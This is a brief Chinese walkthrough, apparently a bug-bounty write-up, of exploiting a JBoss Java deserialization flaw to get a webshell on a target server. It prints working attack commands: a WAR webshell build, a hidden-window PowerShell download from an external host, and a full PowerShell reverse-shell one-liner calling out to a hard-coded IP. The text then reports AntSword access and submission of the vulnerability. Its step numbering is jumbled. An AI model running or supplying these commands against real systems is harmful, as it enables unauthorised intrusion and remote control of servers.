通过资产收集,搜索存在jboss中间件的服务器
利用java反序列化工具进行测试
发现存在jboss反序列化漏洞
步骤四:发现存在可以命令执行并且可以下载操作
步骤三:尝试GetShell..首先使用以下命令创建war
后门...并使用FinalShell上传到服务器...
jar -cvf shell.war peak.jsp
步骤四:在云主机上开启HTTP服务并对外提供文件下载...并在攻击客户端使用PowerShell命令进行WebShell文件下载...
python2 -m SimpleHTTPServer 8080
执行命令
powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://laosec.cn:1234/shell.war','shell.war')
步骤五:在云服务器上使用NC监听1234端口并使用以下命令进行Shell反弹
powershell -c "$client = New-Object Net.Sockets.TCPClient('121.40.248.82',1111);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback=(iex $data 2>&1 | Out-String );$sendata =$sendback+'PS >';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendata);$leng=$sendbyte.Length;$stream.Write($sendbyte,0,$leng);$stream.Flush()};$client.Close()"
步骤六:使用以下命令将上传的war文件移动到网站根目录下并在浏览器中进行访问...已经GetShell...
使用蚁剑连接
到此没有再继续进行深入利用
提交漏洞